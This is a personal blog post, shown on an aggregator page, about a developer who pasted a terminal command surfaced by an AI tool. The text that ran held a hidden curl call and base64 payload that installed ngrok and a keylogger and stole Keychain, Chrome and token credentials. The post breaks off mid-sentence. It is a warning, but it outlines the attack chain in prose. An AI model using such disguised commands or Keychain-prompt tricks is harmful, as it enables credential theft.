RSS

Skimming an AI answer cost me 100 passwords

Reebz1 pts0 comments

Skimming an AI answer cost me 100 passwords – Always Draft

Skimming an AI answer cost me 100 passwords

09 Jun, 2026

NB: This whole story is stupid. I was tired and stupid. I knew better, and this is an "it'll never happen to me, but it did" style of story.

I gave a talk1 at an Anthropic event recently and I said to the audience "a special warning to the non-technical folks: never run a curl command you don't trust". During the Q&A I was asked why and I replied with a quick anecdote, but that it is actually a long story that needs a blog post. Since Mythos2 launched today with its allegedly incredible cybersecurity skills, it seemed like a good time to write this up. So here it is:

The setup<br>It was around midnight and I was tired from a mixture of work, chores, and a newborn. If you hate sleep, I highly recommend this regimen:

Quit your executive job

Start a consulting company

Build software that solves your little problems and open source it (people log bugs they want fixed, who knew?)

Dust off your old "startup ideas list" and start building those too

Move house when your wife is 9 months pregnant(!)

Welcome the new baby (and keep your older children happy too)

Have one of your kids start kindergarten and all the emotion comes with that.

9-9-6? Those are rookie numbers, follow my regime and you'll be running on a 5-12-7 clock. The whole week had been a blur and I was happy to be getting some productive work done, even though it wasn't good quality deep work. It was the kind of work that runs on autopilot and momentum. The kind where you've been at it long enough that you stop questioning yourself, it's muscle memory as you go through the motions, and the default is to reach for the path of least resistance.

I was fiddling with a project in Claude Code and kept running into a plugin issue across sessions. Reload wasn't working, and I kept tripping over env warnings. I was digging around trying to unhide hidden files to edit my configuration and troubleshoot. I was getting frustrated, which led me to this AI prompt:

"I want to unhide all the hidden files on my system. Go find me a terminal command." It came back with a few options and I clicked around the results. I was tired and I didn't want to read.

I glanced at the command to make sure it wasn't garbage… a few characters at the start, a few at the end. I didn't try hard. In retrospect I remember it looked weird, but didn't think it was dangerous. I was tired and I wanted to fix this one thing (just one teeny tiny little thing) and then go to bed.

This is the stupid part. Muscle memory kicked in (people who use Excel with no mouse or Vim will get it): I copied, pasted, and hit enter in milliseconds.

The command I ran was not the command I read.

My heart sank as soon as I saw the command expand in the terminal… It was now much longer. What I saw visually was not what was copied. Why is there a curl command in the middle there? What are all those random characters, is that base64? Holy shit.

Then a flicker in my browser tabs. A Chrome window popped up that I didn't launch and minimized itself near instantly.

I hesitated for a moment thinking I was tired, but I knew something was wrong. I ran a process check. Why is ngrok running? That tool creates a connection from my computer to somewhere remote and I had never used it before. Holy shit #2.

So I ran a quick grep to search for some of my passwords, starting with my local login. There it was, sitting in a plaintext file buried in a temp directory a few folders deep. Holy shit #3.

I'd opened the door to malware, invited it in, and now it was helping itself to all my passwords and credentials.

What it stole<br>The command I'd run contained a base64-encoded payload buried between the parts I'd actually read. Once decoded, it reached out to a domain registered 3 days earlier and pulled down a set of malicious scripts along with ngrok (a legitimate tunneling tool that attackers favor because it makes outbound traffic look unremarkable). By the time I noticed, the malware had been at it for maybe 15 minutes, keylogger installed and running. It took:

My macOS Keychain, the master key to everything else on the system

Auth tokens and API keys sitting in memory and config files

My password manager master password, my local login, and all keystrokes for that time period captured live through the keylogger

Everything stored in Chrome - roughly 100 passwords and 2 saved credit cards.

Chrome encrypts its saved passwords and card details with a key stored in the macOS Keychain, under an entry called Chrome Safe Storage. macOS normally prompts before another process can read it, so the malware either caught me approving a prompt while I was distracted, or wore me down with repeated requests until I clicked allow, I honestly don't remember. Either way, it got the key, and Chrome's password and credit card databases were readable in plain text so it got those too. A Silver Lining: Most of those...

command passwords tired chrome work start

Related Articles

The Newest Instagram "Exploit" Is the Goofiest I've Seen

ssiddharth34 ptsaccount attacker email instagram seen like

Apple WWDC 2026 Livestream

nextstep32 ptsapple stream video event live feed

Claude Fable 5

Philpax30 ptsfable claude mythos model models capabilities

It's Not Just X. It's Y

mooreds21 ptslanguage model writing like grammarly human

Show HN: GoPeek – open links in live mini browser windows without new tabs

GeorgeWoff2518 ptsgopeek open browser links live mini
terms · privacy · disclaimer · contact · policy
© 2026 NewsHub. All rights reserved.
This site is for informational purposes only. Content is aggregated from publicly available sources. We may earn commissions through affiliate links. Not affiliated with Y Combinator or Hacker News.